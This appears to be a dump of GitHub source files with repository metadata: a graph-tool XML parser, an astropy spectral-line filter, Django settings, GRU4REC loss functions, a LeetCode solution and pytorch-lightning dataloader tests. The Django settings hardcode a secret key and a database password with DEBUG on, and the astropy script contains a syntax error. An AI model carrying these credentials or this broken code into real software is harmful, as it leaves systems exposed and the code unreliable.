if name == "comments":
self.commentLevel -= 1
# self.CurrentData = name
# if name == "comment":
# self.CommentFlag = True
def characters(self, content):
if self.currentData == "reaction":
reaction = unicodedata.normalize('NFKD', content).encode('ascii','ignore')
matches = regex.match(reaction)
if matches:
match = matches.group(0)
match_arr = match.split('k')[0]
if len(match_arr) == 2:
reaction = int(match_arr[0]) * 1000
else:
reaction = int(match_arr[0])
else:
reaction = 0
if reaction == 0:
v_pen_width[self.currentPostVertexId] = 0.5
else:
v_pen_width[self.currentPostVertexId] = reaction * 0.01
#add the root vertex to the graph (topic)
vertices["human_rights"] = g.add_vertex()
v_color[vertices["human_rights"]] = color.ROOT
v_size[vertices["human_rights"]] = size.ROOT
v_pen_width[vertices["human_rights"]] = 1.2
#create reader
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_namespaces, 0)
# override the default ContextHandler
Handler = PostHandler()
parser.setContentHandler( Handler )
dirname = "data/"
for f in os.listdir(dirname):
xmlfile = os.path.join(dirname, f)
if os.path.isfile(xmlfile):
parser.parse(xmlfile)
g.vertex_properties["color"] = v_color
g.vertex_properties["size"] = v_size
g.vertex_properties["pen_width"] = v_pen_width
pos = sfdp_layout(g)
graph_draw(g, pos,
vertex_fill_color=v_color,
vertex_font_size=10,
vertex_size=v_size,
vertex_pen_width = v_pen_width,
edge_pen_width=1.2,
output_size=(1000, 1000))
| [
"chrisyzlui@gmail.com"
] | chrisyzlui@gmail.com |
e0d1ea9356bddae1788184d562b30b0e3e591a0b | 3f726711eeb03efa8bde4045a9af2cd8083e986e | /testchild.py | d4c11b2b531be4e70df5b9c65d6444518ea77136 | [] | no_license | samlsoh/testrepo | f639ebb8e58636c43c0d24914a4f4afd7cd4b364 | 8fa3e0db43c2dc4e0bec3a8828f0765aefcbe87b | refs/heads/main | 2023-04-05T14:51:02.661038 | 2021-04-10T07:46:21 | 2021-04-10T07:46:21 | 356,506,769 | 0 | 0 | null | 2021-04-10T07:46:22 | 2021-04-10T07:29:39 | Python | UTF-8 | Python | false | false | 7 | py | ## ttt
| [
"noreply@github.com"
] | samlsoh.noreply@github.com |
72a39cc7fc3b7cf07381a263be7d4e748952b994 | 97031e553affcc420162bcecc7ec5200cdeeaf8b | /Filter.py | 4b7516383c0f0eff6fdc534a50dd5dba9887cff4 | [] | no_license | Chenoachem/Supercomputer-Scripts | 4728a0d554dceb8419bce33e32bb2fa8ac5b2d6e | d5268048bde1b6ebf39d73cb441153fc9e927946 | refs/heads/master | 2020-03-18T13:57:34.959864 | 2018-05-25T08:59:09 | 2018-05-25T08:59:09 | 134,820,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,704 | py |
import os
import argparse
import numpy as np
import astropy
from astropy.io import fits
import matplotlib
from matplotlib import pyplot as plt
from astropy.coordinates import SkyCoord # High-level coordinates
from astropy.coordinates import ICRS, Galactic, FK4, FK5 # Low-level frames
from astropy.coordinates import Angle, Latitude, Longitude # Angles
import astropy.units as u
from astropy import wcs
import math
import sys
mycube=sys.argv[1]
cat_files = sys.argv[2]
#ra=sys.argv[2]
#dec=sys.argv[3]
#Open a cube file
datacube = fits.open(mycube)
data = datacube[0].data
header = datacube[0].header
#Set the World Coordinates up
w = wcs.WCS(header, naxis=2)
#Get a list of frequencies within the cube
rp = datacube[0].header['CRPIX3']
rf = datacube[0].header['CRVAL3']
df = datacube[0].header['CDELT3']
nf = datacube[0].header['NAXIS3']
xvals = rf + df*(np.arange(nf)-rp)
xvals_small=xvals[0:100]
#Determine the nubmer of pixels per beam based on the header information.
bmaj=header['BMAJ']
bmin=header['BMIN']
cdelt1=header['CDELT1']
cdelt2=header['CDELT2']
beam_pix=math.sqrt((bmaj*bmin)/(-cdelt1*cdelt2))
#Set the input location of the potential spectral line
#ra='06:05:48.86'
#dec='+00:31:47.09'
file=open(cat_files)
for line in file:
ra,dec = line.strip().split(",")
ra=str(ra)
dec=str(dec)
c = SkyCoord(ra, dec, unit=(u.hourangle, u.deg))
#Convert the world coordinates to pixel coordinates
ypix,xpix=c.to_pixel(w,origin=0,mode='wcs')
#Get the pixel coordinates to build a box around the potential spectarl line
xpix1=xpix-(beam_pix/2)
xpix2=xpix+(beam_pix/2)
ypix1=ypix-(beam_pix/2)
ypix2=ypix+(beam_pix/2)
#Make a list of the signal for the spectra accross all the frequencies within the cube.
signal=[]
for x in range(0, 100):
value = np.nanmean(data[:,x,xpix1:xpix2,ypix1:ypix2])
#print rms_number_x
signal.append(value)
signal=np.multiply(signal,1.13)
#Determine the maximum signal value
max_signal=np.nan_to_num(signal)
max_value = np.amax(max_signal)
#Calculate the local RMS from the spectra
RMS=np.nanstd(signal)
RMS2=str(round(RMS,2))
if RMS>0.5 AND max_value/RMS>5:
with open('ra_dec_cat', 'a') as f:
f.write(str(ra)+","+str(dec)+"\n")
#Make a spectra
bigfig=plt.figure(figsize=(20,12))
ax1=bigfig.add_subplot(111)
ax1.step(xvals_small/10**6,signal,color='blue')
ax1.set_title("Orion Nebula "+str(round(xvals[0]/10**6,2)),fontsize=18)
ax1.set_xlabel("Frequency (MHz)",fontsize=18)
ax1.set_ylabel("Flux (Jy)",fontsize=18)
ax1.tick_params(labelsize=15)
ax2=ax1.twinx()
ax2.step(xvals_small/10**6,signal/RMS,linewidth=2, color='red')
ax2.set_ylabel("Signal to Noise Ratio", fontsize=18)
ax2.tick_params(labelsize=14)
ax1.text(xvals_small[60]/10**6, max_value+4 , 'Local RMS='+str(RMS2), fontsize=18)
ax1ylims = ax1.get_ybound()
ax2ylims = ax2.get_ybound()
ax1factor = 1 * 6
ax2factor = 1 * 6
ax1.set_yticks(np.linspace(ax1ylims[0],
ax1ylims[1]+(ax1factor -
(ax1ylims[1]+ax1ylims[0]) % ax1factor) %
ax1factor,
7))
ax2.set_yticks(np.linspace(ax2ylims[0],
ax2ylims[1]+(ax2factor -
(ax2ylims[1]+ax2ylims[0]) % ax2factor) %
ax2factor,
7))
bigfig.savefig("Orion_"+str(ra)+"_"+str(round(xvals[0]/10**6,0))+"_.png")
| [
"chenoa.tremblay@postgrad.curtin.edu.au"
] | chenoa.tremblay@postgrad.curtin.edu.au |
8a8e93b421403ad32883aba736e8f4d8f304e750 | aa5e3ee6d00f79a97480ea9eaecefe94373e8d21 | /electrify/electrify/settings.py | f10ca6bfaf148e60b4f775be35dfdf38dcb45f6e | [] | no_license | natchu/designAlgo | 8c79c128e64c026aea19c1e3b12a51a769f41732 | 46863bd7e3d0ace3e0afe516b0436603c0c2a349 | refs/heads/master | 2020-04-10T12:07:46.422321 | 2018-12-09T22:43:41 | 2018-12-09T22:43:41 | 161,012,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,219 | py | """
Django settings for electrify project.
Generated by 'django-admin startproject' using Django 1.11.17.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+hgo@d!4*mo+w@i77u1y(sy*uu04z3udj(*%z=15+fg+i=(9kg'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'electrify'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'electrify.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'electrify.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'electrify',
'USER': 'postgres',
'PASSWORD': 'admin',
'HOST': 'localhost',
'PORT': '5432'
}
}
''
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-nz'
TIME_ZONE = 'NZ'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"natch@Natchus-MacBook-Pro.fritz.box"
] | natch@Natchus-MacBook-Pro.fritz.box |
81c99e05387c044a3ac1267ff206a5f92e342628 | 8eadb61a38ccd0611cb2a3bdbe1a34063ebeab39 | /GRU4REC/modules/loss.py | b9f29357a876cf522a39545482508832353c8f27 | [] | no_license | yw4509/NewRecomendationSystem | 52ab8b3fe59465a32bba4c8312bc4af152c69ef5 | b58b06e70d150de45fff35b311b47085eaf533a1 | refs/heads/master | 2022-04-17T10:45:17.257869 | 2020-04-17T14:49:19 | 2020-04-17T14:49:19 | 256,531,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,348 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
def LossFunction(loss_type):
if loss_type == 'CrossEntropy':
loss_fn = SampledCrossEntropyLoss
elif loss_type == 'TOP1':
loss_fn = TOP1Loss
elif loss_type == 'BPR':
loss_fn = BPRLoss
else:
raise NotImplementedError
return loss_fn
xe_loss = nn.CrossEntropyLoss()
def SampledCrossEntropyLoss(logit):
""" CrossEntropyLoss with n_classes = batch_size = the number of samples in the session-parallel mini-batch """
batch_size = logit.size(1)
target = torch.arange(batch_size).long().to(logit.device)
return xe_loss(logit, target)
def BPRLoss(logit):
"""
Args:
logit (BxB): Variable that stores the logits for the items in the session-parallel mini-batch.
Negative samples for a specific item are drawn from the other items in the
session-parallel minibatch, as mentioned in the original GRU4REC paper.
The first dimension corresponds to the batches, and the second dimension
corresponds to sampled number of items to evaluate.
"""
# differences between the item scores
diff = logit.diag().view(-1, 1).expand_as(logit) - logit
# final loss
loss = -torch.mean(F.logsigmoid(diff))
return loss
def TOP1Loss(logit):
"""
Args:
logit (BxB): Variable that stores the logits for the items in the session-parallel mini-batch.
Negative samples for a specific item are drawn from the other items in the
session-parallel minibatch, as mentioned in the original GRU4REC paper.
The first dimension corresponds to the batches, and the second dimension
corresponds to sampled number of items to evaluate.
"""
# differences between the item scores
diff = -(logit.diag().view(-1, 1).expand_as(logit) - logit)
# final loss
loss = F.sigmoid(diff).mean() + F.sigmoid(logit ** 2).mean()
return loss
# class LossFunction(nn.Module):
# def __init__(self, loss_type='TOP1', use_cuda=True):
# """ An abstract loss function that can supports custom loss functions compatible with PyTorch."""
# super().__init__()
# self.loss_type = loss_type
# self.use_cuda = use_cuda
# if loss_type == 'CrossEntropy':
# self._loss_fn = SampledCrossEntropyLoss(use_cuda)
# elif loss_type == 'TOP1':
# self._loss_fn = TOP1Loss()
# elif loss_type == 'BPR':
# self._loss_fn = BPRLoss()
# else:
# raise NotImplementedError
# class SampledCrossEntropyLoss(nn.Module):
# """ CrossEntropyLoss with n_classes = batch_size = the number of samples in the session-parallel mini-batch """
# def __init__(self, use_cuda):
# """
# See Balazs Hihasi(ICLR 2016), pg.5
# Args:
# use_cuda (bool): whether to use cuda or not
# """
# super().__init__()
# self.xe_loss = nn.CrossEntropyLoss()
# self.use_cuda = use_cuda
# def forward(self, logit):
# batch_size = logit.size(1)
# target = Variable(torch.arange(batch_size).long())
# if self.use_cuda: target = target.cuda()
# return self.xe_loss(logit, target)
# def forward(self, logit):
# return self._loss_fn(logit)
# class BPRLoss(nn.Module):
# def __init__(self):
# """
# See Balazs Hihasi(ICLR 2016), pg.5
# """
# super().__init__()
# def forward(self, logit):
# """
# Args:
# logit (BxB): Variable that stores the logits for the items in the session-parallel mini-batch.
# Negative samples for a specific item are drawn from the other items in the
# session-parallel minibatch, as mentioned in the original GRU4REC paper.
# The first dimension corresponds to the batches, and the second dimension
# corresponds to sampled number of items to evaluate.
# """
# # differences between the item scores
# diff = logit.diag().view(-1, 1).expand_as(logit) - logit
# # final loss
# loss = -torch.mean(F.logsigmoid(diff))
# return loss
# class TOP1Loss(nn.Module):
# def __init__(self):
# """
# See Balazs Hihasi(ICLR 2016), pg.5
# """
# super().__init__()
# def forward(self, logit):
# """
# Args:
# logit (BxB): Variable that stores the logits for the items in the session-parallel mini-batch.
# Negative samples for a specific item are drawn from the other items in the
# session-parallel minibatch, as mentioned in the original GRU4REC paper.
# The first dimension corresponds to the batches, and the second dimension
# corresponds to sampled number of items to evaluate.
# """
# # differences between the item scores
# diff = -(logit.diag().view(-1, 1).expand_as(logit) - logit)
# # final loss
# loss = F.sigmoid(diff).mean() + F.sigmoid(logit ** 2).mean()
# return loss
| [
"yw4509@nyu.edu"
] | yw4509@nyu.edu |
32772c6525955d24f7e8d62c333054bace5d0c9e | 57a55b98af1da63c806b47ff88b468f131b2989b | /03 - August Leetcode Challenge/12 - 119. Pascal's Triangle II.py | c9e37e9793c93d67947aaaf98e63af7e91110e3b | [] | no_license | MedhaNagaraj/Leetcode-Problems | 10545cb118e74dbef9fb5037fb6909f559595e6f | 8973804731b208ebfdd5e37436668c3c15c97f6d | refs/heads/master | 2022-12-18T07:44:12.994756 | 2020-09-17T14:40:28 | 2020-09-17T14:40:28 | 276,165,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | """
119. Pascal's Triangle II
Given a non-negative index k where k ≤ 33, return the kth index row of the Pascal's triangle.
Note that the row index starts from 0.
In Pascal's triangle, each number is the sum of the two numbers directly above it.
Example:
Input: 3
Output: [1,3,3,1]
Follow up:
Could you optimize your algorithm to use only O(k) extra space?
"""
class Solution:
def getRow(self, rowIndex: int) -> List[int]:
# return [1] + [int(str((10**10+1)**k)[-10*(i+1):-10*i]) for i in range(1,k+1)]
return reduce(lambda r,_:[1]+[r[j]+r[j+1] for j in range(len(r)-1)]+[1], range(rowIndex),[1])
| [
"noreply@github.com"
] | MedhaNagaraj.noreply@github.com |
25a07303c5bf387a10234af8fbf3f95ddf57d6a8 | 02a27ec28d9e0b181324e53f4db127baa4acdf81 | /paratus/cat2vec.py | d273a0b3be813f9f2d6b096609c8983a9eae64fb | [] | no_license | jaume-ferrarons/paratus | 886363215c41c8884b0dfc979ad392a604be9001 | 667d55085ff6314e4c12f1e53a9c644276c23d90 | refs/heads/master | 2020-05-30T00:18:18.525748 | 2019-09-22T16:14:35 | 2019-09-22T16:14:35 | 189,456,371 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 923 | py | import numpy as np
import tensorflow as tf
from tensorflow.keras import layers, losses, callbacks, models
from paratus.autoencoder import Autoencoder
class Cat2Vec(Autoencoder):
def _input_layers(self, X):
n_features = X.shape[1]
print("#features: {}".format(n_features))
inputs = []
outputs = []
for i in range(n_features):
size = len(np.unique(X[:, i]))
model = models.Sequential()
model.add(layers.Embedding(size, int(np.ceil(np.log2(size))),
input_length=1,
name="Embedding_{}".format(i)))
model.add(layers.Flatten())
inputs.append(model.input)
outputs.append(model.output)
return inputs, outputs
def _format_input(self, X):
n_features = X.shape[1]
return [X[:, i] for i in range(n_features)]
| [
"ckroxigor@gmail.com"
] | ckroxigor@gmail.com |
cbc5f4ee8235f55c75f0cbc46d9e3ff8540ec936 | 0db794cd38729871ae4a431e4d3261d194addb22 | /tests/trainer/test_dataloaders.py | 1c7e21b7a72bb557d57ac83bec57b3b99f66d79d | [
"Apache-2.0"
] | permissive | scarecrow1123/pytorch-lightning | 465acd306c6f0d9f6c6dc1b76deb2b648f08aa60 | 66aa5270daf92813f3b1717513d1915ac6637fb4 | refs/heads/master | 2022-11-30T18:09:03.584325 | 2020-08-09T18:06:56 | 2020-08-09T18:06:56 | 285,723,364 | 0 | 0 | Apache-2.0 | 2020-08-07T03:00:11 | 2020-08-07T03:00:10 | null | UTF-8 | Python | false | false | 28,928 | py | import os
import platform
from unittest.mock import patch
import pytest
import torch
from packaging.version import parse
from torch.utils.data.dataloader import DataLoader
from torch.utils.data.dataset import IterableDataset, Subset
from torch.utils.data.distributed import DistributedSampler
import tests.base.develop_pipelines as tpipes
from pytorch_lightning import Trainer, Callback
from pytorch_lightning.trainer.data_loading import _has_iterable_dataset, _has_len
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from tests.base import EvalModelTemplate
def test_fit_train_loader_only(tmpdir):
model = EvalModelTemplate()
train_dataloader = model.train_dataloader()
model.train_dataloader = None
model.val_dataloader = None
model.test_dataloader = None
model.validation_step = None
model.validation_epoch_end = None
model.test_step = None
model.test_epoch_end = None
trainer = Trainer(fast_dev_run=True, default_root_dir=tmpdir)
trainer.fit(model, train_dataloader=train_dataloader)
def test_fit_val_loader_only(tmpdir):
model = EvalModelTemplate()
train_dataloader = model.train_dataloader()
val_dataloader = model.val_dataloader()
model.train_dataloader = None
model.val_dataloader = None
model.test_dataloader = None
model.test_step = None
model.test_epoch_end = None
trainer = Trainer(fast_dev_run=True, default_root_dir=tmpdir)
trainer.fit(model, train_dataloader=train_dataloader, val_dataloaders=val_dataloader)
@pytest.mark.parametrize("dataloader_options", [
dict(val_check_interval=1.1),
dict(val_check_interval=10000),
])
def test_dataloader_config_errors_runtime(tmpdir, dataloader_options):
model = EvalModelTemplate()
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
**dataloader_options,
)
with pytest.raises(ValueError):
# fit model
trainer.fit(model)
@pytest.mark.parametrize("dataloader_options", [
dict(limit_train_batches=-0.1),
dict(limit_train_batches=1.2),
dict(limit_val_batches=-0.1),
dict(limit_val_batches=1.2),
dict(limit_test_batches=-0.1),
dict(limit_test_batches=1.2),
])
def test_dataloader_config_errors_init(tmpdir, dataloader_options):
with pytest.raises(MisconfigurationException):
Trainer(
default_root_dir=tmpdir,
max_epochs=1,
**dataloader_options,
)
def test_multiple_val_dataloader(tmpdir):
"""Verify multiple val_dataloader."""
model = EvalModelTemplate()
model.val_dataloader = model.val_dataloader__multiple
model.validation_step = model.validation_step__multiple_dataloaders
model.validation_epoch_end = model.validation_epoch_end__multiple_dataloaders
# fit model
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_val_batches=0.1,
limit_train_batches=1.0,
)
result = trainer.fit(model)
# verify training completed
assert result == 1
# verify there are 2 val loaders
assert len(trainer.val_dataloaders) == 2, \
'Multiple val_dataloaders not initiated properly'
# make sure predictions are good for each val set
for dataloader in trainer.val_dataloaders:
tpipes.run_prediction(dataloader, trainer.model)
@pytest.mark.parametrize('ckpt_path', [None, 'best', 'specific'])
def test_multiple_test_dataloader(tmpdir, ckpt_path):
"""Verify multiple test_dataloader."""
model_template = EvalModelTemplate()
class MultipleTestDataloaderModel(EvalModelTemplate):
def test_dataloader(self):
return model_template.test_dataloader__multiple()
def test_step(self, batch, batch_idx, *args, **kwargs):
return model_template.test_step__multiple_dataloaders(batch, batch_idx, *args, **kwargs)
model = MultipleTestDataloaderModel()
# fit model
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_val_batches=0.1,
limit_train_batches=0.2,
)
trainer.fit(model)
if ckpt_path == 'specific':
ckpt_path = trainer.checkpoint_callback.best_model_path
trainer.test(ckpt_path=ckpt_path)
# verify there are 2 test loaders
assert len(trainer.test_dataloaders) == 2, \
'Multiple test_dataloaders not initiated properly'
# make sure predictions are good for each test set
for dataloader in trainer.test_dataloaders:
tpipes.run_prediction(dataloader, trainer.model)
# run the test method
trainer.test(ckpt_path=ckpt_path)
def test_train_dataloader_passed_to_fit(tmpdir):
"""Verify that train dataloader can be passed to fit """
# only train passed to fit
model = EvalModelTemplate()
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_val_batches=0.1,
limit_train_batches=0.2,
)
fit_options = dict(train_dataloader=model.dataloader(train=True))
result = trainer.fit(model, **fit_options)
assert result == 1
def test_train_val_dataloaders_passed_to_fit(tmpdir):
""" Verify that train & val dataloader can be passed to fit """
# train, val passed to fit
model = EvalModelTemplate()
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_val_batches=0.1,
limit_train_batches=0.2,
)
fit_options = dict(train_dataloader=model.dataloader(train=True),
val_dataloaders=model.dataloader(train=False))
result = trainer.fit(model, **fit_options)
assert result == 1
assert len(trainer.val_dataloaders) == 1, \
f'`val_dataloaders` not initiated properly, got {trainer.val_dataloaders}'
@pytest.mark.parametrize('ckpt_path', [None, 'best', 'specific'])
def test_all_dataloaders_passed_to_fit(tmpdir, ckpt_path):
"""Verify train, val & test dataloader(s) can be passed to fit and test method"""
model = EvalModelTemplate()
# train, val and test passed to fit
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_val_batches=0.1,
limit_train_batches=0.2,
)
fit_options = dict(train_dataloader=model.dataloader(train=True),
val_dataloaders=model.dataloader(train=False))
result = trainer.fit(model, **fit_options)
if ckpt_path == 'specific':
ckpt_path = trainer.checkpoint_callback.best_model_path
test_options = dict(test_dataloaders=model.dataloader(train=False),
ckpt_path=ckpt_path)
trainer.test(**test_options)
assert result == 1
assert len(trainer.val_dataloaders) == 1, \
f'val_dataloaders` not initiated properly, got {trainer.val_dataloaders}'
assert len(trainer.test_dataloaders) == 1, \
f'test_dataloaders` not initiated properly, got {trainer.test_dataloaders}'
@pytest.mark.parametrize('ckpt_path', [None, 'best', 'specific'])
def test_multiple_dataloaders_passed_to_fit(tmpdir, ckpt_path):
"""Verify that multiple val & test dataloaders can be passed to fit."""
model = EvalModelTemplate()
model.validation_step = model.validation_step__multiple_dataloaders
model.validation_epoch_end = model.validation_epoch_end__multiple_dataloaders
model.test_step = model.test_step__multiple_dataloaders
# train, multiple val and multiple test passed to fit
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_val_batches=0.1,
limit_train_batches=0.2,
)
fit_options = dict(train_dataloader=model.dataloader(train=True),
val_dataloaders=[model.dataloader(train=False),
model.dataloader(train=False)])
trainer.fit(model, **fit_options)
if ckpt_path == 'specific':
ckpt_path = trainer.checkpoint_callback.best_model_path
test_options = dict(test_dataloaders=[model.dataloader(train=False),
model.dataloader(train=False)],
ckpt_path=ckpt_path)
trainer.test(**test_options)
assert len(trainer.val_dataloaders) == 2, \
f'Multiple `val_dataloaders` not initiated properly, got {trainer.val_dataloaders}'
assert len(trainer.test_dataloaders) == 2, \
f'Multiple `test_dataloaders` not initiated properly, got {trainer.test_dataloaders}'
@pytest.mark.parametrize(
['limit_train_batches', 'limit_val_batches', 'limit_test_batches'],
[
pytest.param(0.0, 0.0, 0.0),
pytest.param(0, 0, 0.5),
pytest.param(1.0, 1.0, 1.0),
pytest.param(0.2, 0.4, 0.4),
]
)
def test_dataloaders_with_limit_percent_batches(tmpdir, limit_train_batches, limit_val_batches, limit_test_batches):
"""Verify num_batches for val & test dataloaders passed with batch limit in percent"""
model = EvalModelTemplate()
model.val_dataloader = model.val_dataloader__multiple_mixed_length
model.test_dataloader = model.test_dataloader__multiple_mixed_length
model.validation_step = model.validation_step__multiple_dataloaders
model.validation_epoch_end = model.validation_epoch_end__multiple_dataloaders
model.test_step = model.test_step__multiple_dataloaders
model.test_epoch_end = model.test_epoch_end__multiple_dataloaders
# train, multiple val and multiple test passed with percent_check
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_train_batches=limit_train_batches,
limit_val_batches=limit_val_batches,
limit_test_batches=limit_test_batches,
)
trainer.fit(model)
expected_train_batches = int(len(trainer.train_dataloader) * limit_train_batches)
expected_val_batches = [
int(len(dataloader) * limit_val_batches) for dataloader in trainer.val_dataloaders
]
assert trainer.num_training_batches == expected_train_batches
assert trainer.num_val_batches == expected_val_batches
trainer.test(ckpt_path=None)
expected_test_batches = [
int(len(dataloader) * limit_test_batches) for dataloader in trainer.test_dataloaders
]
assert trainer.num_test_batches == expected_test_batches
@pytest.mark.parametrize(
['limit_train_batches', 'limit_val_batches', 'limit_test_batches'],
[
pytest.param(0, 0, 0),
pytest.param(1, 2, 3),
pytest.param(1, 2, 1e50),
]
)
def test_dataloaders_with_limit_num_batches(tmpdir, limit_train_batches, limit_val_batches, limit_test_batches):
"""Verify num_batches for val & test dataloaders passed with batch limit as number"""
os.environ['PL_DEV_DEBUG'] = '1'
model = EvalModelTemplate()
model.val_dataloader = model.val_dataloader__multiple_mixed_length
model.test_dataloader = model.test_dataloader__multiple_mixed_length
model.validation_step = model.validation_step__multiple_dataloaders
model.validation_epoch_end = model.validation_epoch_end__multiple_dataloaders
model.test_step = model.test_step__multiple_dataloaders
model.test_epoch_end = model.test_epoch_end__multiple_dataloaders
# train, multiple val and multiple test passed with percent_check
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_train_batches=limit_train_batches,
limit_val_batches=limit_val_batches,
limit_test_batches=limit_test_batches,
)
trainer.fit(model)
# -------------------------------------------
# MAKE SURE THE TRAINER SET THE CORRECT VALUES
# -------------------------------------------
assert trainer.num_training_batches == limit_train_batches
assert trainer.num_val_batches == [limit_val_batches] * len(trainer.val_dataloaders)
trainer.test(ckpt_path=None)
# when the limit is greater than the number of test batches it should be the num in loaders
test_dataloader_lengths = [len(x) for x in model.test_dataloader()]
if limit_test_batches > 1e10:
assert trainer.num_test_batches == test_dataloader_lengths
else:
assert trainer.num_test_batches == [limit_test_batches] * len(trainer.test_dataloaders)
# -------------------------------------------
# make sure we actually saw the expected num of batches
# -------------------------------------------
num_val_dataloaders = len(model.val_dataloader())
num_test_dataloaders = len(model.test_dataloader())
if limit_train_batches > 0:
# make sure val batches are as expected
assert len(trainer.dev_debugger.num_seen_val_check_batches) == num_val_dataloaders
for dataloader_idx, num_batches in trainer.dev_debugger.num_seen_val_check_batches.items():
assert num_batches == limit_val_batches
# make sure test batches are as expected
assert len(trainer.dev_debugger.num_seen_test_check_batches) == num_test_dataloaders
for dataloader_idx, num_batches in trainer.dev_debugger.num_seen_test_check_batches.items():
if limit_test_batches > 1e10:
assert num_batches == test_dataloader_lengths[dataloader_idx]
else:
assert num_batches == limit_test_batches
def test_dataloaders_with_fast_dev_run(tmpdir):
"""Verify num_batches for train, val & test dataloaders passed with fast_dev_run = True"""
os.environ['PL_DEV_DEBUG'] = '1'
model = EvalModelTemplate()
model.val_dataloader = model.val_dataloader__multiple_mixed_length
model.test_dataloader = model.test_dataloader__multiple_mixed_length
model.validation_step = model.validation_step__multiple_dataloaders
model.validation_epoch_end = model.validation_epoch_end__multiple_dataloaders
model.test_step = model.test_step__multiple_dataloaders
model.test_epoch_end = model.test_epoch_end__multiple_dataloaders
# train, multiple val and multiple test dataloaders passed with fast_dev_run = True
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=2,
fast_dev_run=True,
)
assert trainer.max_epochs == 1
assert trainer.num_sanity_val_steps == 0
trainer.fit(model)
assert not trainer.disable_validation
assert trainer.num_training_batches == 1
assert trainer.num_val_batches == [1] * len(trainer.val_dataloaders)
trainer.test(ckpt_path=None)
assert trainer.num_test_batches == [1] * len(trainer.test_dataloaders)
# verify sanity check batches match as expected
num_val_dataloaders = len(model.val_dataloader())
assert trainer.dev_debugger.num_seen_sanity_check_batches == trainer.num_sanity_val_steps * num_val_dataloaders
@pytest.mark.parametrize('ckpt_path', [None, 'best', 'specific'])
def test_mixing_of_dataloader_options(tmpdir, ckpt_path):
"""Verify that dataloaders can be passed to fit"""
model = EvalModelTemplate()
trainer_options = dict(
default_root_dir=tmpdir,
max_epochs=1,
limit_val_batches=0.1,
limit_train_batches=0.2,
)
# fit model
trainer = Trainer(**trainer_options)
results = trainer.fit(model, val_dataloaders=model.dataloader(train=False))
assert results
# fit model
trainer = Trainer(**trainer_options)
results = trainer.fit(model, val_dataloaders=model.dataloader(train=False))
assert results
if ckpt_path == 'specific':
ckpt_path = trainer.checkpoint_callback.best_model_path
trainer.test(test_dataloaders=model.dataloader(train=False), ckpt_path=ckpt_path)
assert len(trainer.val_dataloaders) == 1, \
f'`val_dataloaders` not initiated properly, got {trainer.val_dataloaders}'
assert len(trainer.test_dataloaders) == 1, \
f'`test_dataloaders` not initiated properly, got {trainer.test_dataloaders}'
def test_train_inf_dataloader_error(tmpdir):
"""Test inf train data loader (e.g. IterableDataset)"""
model = EvalModelTemplate()
model.train_dataloader = model.train_dataloader__infinite
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, val_check_interval=0.5)
with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
trainer.fit(model)
def test_val_inf_dataloader_error(tmpdir):
"""Test inf train data loader (e.g. IterableDataset)"""
model = EvalModelTemplate()
model.val_dataloader = model.val_dataloader__infinite
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, limit_val_batches=0.5)
with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
trainer.fit(model)
